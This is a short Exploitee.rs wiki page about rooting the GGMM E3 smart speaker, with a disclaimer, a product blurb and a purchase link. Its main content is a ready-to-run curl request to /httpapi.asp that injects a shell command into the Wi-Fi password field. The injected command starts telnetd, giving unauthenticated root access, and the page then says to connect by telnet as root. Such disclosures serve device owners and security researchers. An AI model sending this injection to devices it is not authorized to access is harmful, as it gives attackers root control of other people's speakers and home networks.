GGMM E3 Smart Speaker

From Exploitee.rs
Revision as of 12:24, 10 August 2017 by Zenofex (talk | contribs)

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

GGMME3.JPG

GGMM E3 Smart Speaker

"Enjoy the full rich sound by wirelessly streaming your favirote music to GGMM E3. E3 uses Wi-Fi/ Bluetooth 4.0 technology to equally project exquisite audio wirelessly."

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the GGMM E3 Smart Speaker at Amazon

Pre Auth Root Command Injection

Target: /httpapi.asp

curl 'http://192.168.43.37/httpapi.asp' -H 'CONTENT-TYPE: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'Connection: keep-alive' -H 'If-Modified-Since: 0, 0' --data 'command=wlanConnectApEx:ssid=636A32:ch=1:auth=WPA2PSK:encry=AES:pwd=3132333435363738;/usr/sbin/telnetd;:chext=0' --compressed

Connect to the telnet service as root

Demo